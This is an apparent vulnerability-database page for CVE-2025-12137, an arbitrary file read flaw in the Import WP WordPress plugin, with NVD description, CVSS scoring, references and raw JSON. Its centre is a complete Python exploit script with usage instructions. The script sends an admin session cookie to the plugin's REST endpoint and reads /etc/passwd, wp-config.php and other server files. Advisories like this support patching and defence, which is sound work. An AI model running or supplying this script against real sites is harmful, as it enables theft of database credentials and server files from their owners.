Security Vulnerability Report
CVE-2025-12137 CVSS 4.9 MEDIUM

CVE-2025-12137

Published: 2025-11-01 07:15:35
Last Modified: 2026-04-15 00:35:42

Description

The Import WP – Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.14.16. This is due to the plugin's REST API endpoint accepting arbitrary absolute file paths without proper validation in the 'attach_file()' function when handling 'file_local' actions. This makes it possible for authenticated attackers, with administrator-level access and above, to read arbitrary files on the server's filesystem, including sensitive configuration files and system files via the 'local_url' parameter.

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record.

Affected product: Import WP plugin, all versions up to and including 2.14.16.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-12137 PoC - WordPress Import WP Arbitrary File Read
# Target: WordPress site with Import WP plugin <= 2.14.16
# Auth: Requires administrator-level access (the endpoint is authenticated)


def exploit_cve_2025_12137(target_url, cookie):
    """
    Exploit for CVE-2025-12137.
    Reads arbitrary files from the server by passing an absolute path
    in the 'local_url' parameter of a 'file_local' action, which the
    plugin's attach_file() accepts without validation.
    """
    endpoint = f"{target_url}/wp-json/importwp/v1/file"

    # Target files to read
    target_files = [
        "/etc/passwd",
        "/var/www/html/wp-config.php",
        "/etc/hostname",
        "/etc/hosts",
    ]

    headers = {
        "Content-Type": "application/json",
        "Cookie": cookie,  # admin session cookie
    }

    for file_path in target_files:
        payload = {
            "action": "file_local",
            "local_url": file_path,
        }
        try:
            response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
            if response.status_code == 200:
                print(f"[+] Successfully read: {file_path}")
                print(response.text[:500])
                print("-" * 50)
            else:
                print(f"[-] Failed to read: {file_path} (Status: {response.status_code})")
        except requests.RequestException as e:
            print(f"[!] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <admin_cookie>")
        print("Example: python exploit.py http://target.com 'wordpress_logged_in_xxx=xxx'")
        sys.exit(1)
    exploit_cve_2025_12137(sys.argv[1], sys.argv[2])
```

References

Weakness classification (NVD): CWE-73

https://cwe.mitre.org/data/definitions/36.html
https://github.com/importwp/importwp/commit/94cc524aa0c81be6463a9e8d154b00220e34709c
https://owasp.org/www-community/attacks/Path_Traversal
https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Filesystem/Filesystem.php#L212
https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Filesystem/Filesystem.php#L56
https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Importer/ImporterManager.php#L435
https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Rest/RestManager.php#L1079
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3387749%40jc-importer&new=3387749%40jc-importer&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/f10636ea-06aa-4186-a891-ed4bb0800c41?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12137",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-01T07:15:35.333",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Import WP – Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.14.16. This is due to the plugin's REST API endpoint accepting arbitrary absolute file paths without proper validation in the 'attach_file()' function when handling 'file_local' actions. This makes it possible for authenticated attackers, with administrator-level access and above, to read arbitrary files on the server's filesystem, including sensitive configuration files and system files via the 'local_url' parameter."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-73"
          }
        ]
      }
    ],
    "references": [
      {"url": "https://cwe.mitre.org/data/definitions/36.html", "source": "[email protected]"},
      {"url": "https://github.com/importwp/importwp/commit/94cc524aa0c81be6463a9e8d154b00220e34709c", "source": "[email protected]"},
      {"url": "https://owasp.org/www-community/attacks/Path_Traversal", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Filesystem/Filesystem.php#L212", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Filesystem/Filesystem.php#L56", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Importer/ImporterManager.php#L435", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/jc-importer/trunk/class/Common/Rest/RestManager.php#L1079", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3387749%40jc-importer&new=3387749%40jc-importer&sfp_email=&sfph_mail=", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f10636ea-06aa-4186-a891-ed4bb0800c41?source=cve", "source": "[email protected]"}
    ]
  }
}
```